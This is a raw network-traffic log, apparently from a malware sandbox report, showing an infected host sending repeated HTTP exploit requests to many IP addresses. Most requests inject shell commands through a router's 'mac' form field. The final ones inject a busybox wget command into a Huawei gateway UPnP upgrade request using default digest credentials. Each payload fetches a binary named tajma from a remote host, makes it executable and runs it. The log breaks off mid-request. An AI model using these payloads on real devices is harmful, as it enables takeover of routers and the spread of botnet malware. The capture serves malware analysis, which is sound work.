                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1380192.168.2.235118851.168.84.978080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.372445107 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1381192.168.2.233599244.20.127.798080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.372473001 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1382192.168.2.2358772194.44.108.1768080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.372487068 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1383192.168.2.2353626129.232.30.648080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.372534037 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1384192.168.2.2350854131.236.34.898080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.372556925 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1385192.168.2.235005812.76.200.758080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.372574091 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1386192.168.2.234596064.220.125.1728080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.372590065 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1387192.168.2.233714819.53.138.798080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.372616053 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1388192.168.2.2350188125.44.120.1808080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.372620106 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1389192.168.2.2341436121.249.94.1818080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.373085022 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1390192.168.2.234546681.252.3.2298080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.426021099 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1391192.168.2.2350746114.62.8.968080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.426105976 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1392192.168.2.2343152110.128.210.148080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.426172018 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1393192.168.2.23502609.64.175.1928080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.426238060 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1394192.168.2.236092668.31.113.2328080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.426246881 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1395192.168.2.2348558219.234.38.68080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.426271915 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1396192.168.2.2354726120.126.144.2018080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.426289082 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1397192.168.2.2351606164.206.245.1778080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.426314116 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1398192.168.2.2348044116.184.251.6137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.523570061 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1399192.168.2.2335264157.224.1.16137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.523582935 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
